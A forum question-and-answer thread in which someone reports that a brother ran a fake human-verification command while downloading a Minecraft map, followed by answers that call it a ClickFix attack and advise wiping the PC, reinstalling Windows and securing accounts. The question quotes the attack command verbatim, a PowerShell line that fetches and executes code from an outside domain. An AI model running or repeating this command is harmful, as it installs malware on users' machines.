My brother tried to download a Minecraft map and encountered a fake human-verification prompt. It instructed him to press Windows+R, paste a command, and run it. The command was: powershell "iex(irm 'boltpopsecretbutton.monster/yMGgXKZhP5sdefaN')". I'm worried this may have installed malware. What could it have done, and what steps should I take to secure the computer and my accounts?
3 Answers
Before reinstalling, secure your online accounts from another device and prioritize your email account because it can be used to reset other passwords. Enable two-factor authentication, revoke existing sessions or login tokens, and contact your bank or other financial providers if sensitive information may have been exposed. Do not connect the affected computer again until it has been wiped and Windows has been freshly installed.
Treat the computer as compromised. Disconnect it from the internet immediately, then use a different, trusted device to change passwords for email, banking, Microsoft, and other important accounts. Also choose the option to sign out of all active sessions wherever it’s available. The safest cleanup is to back up only personal documents and photos, then completely wipe the drive and reinstall Windows from trusted installation media. Avoid backing up or running executable files because they may be infected.
This is a known fake-verification technique often called a ClickFix attack. Legitimate verification pages do not ask you to open Run and execute a PowerShell command. The command downloads and runs code from a suspicious domain, so antivirus detection cannot be relied on as proof that everything is clean. A full reinstall is more dependable than trying to remove individual files.

How do I create the installation media and reinstall Windows?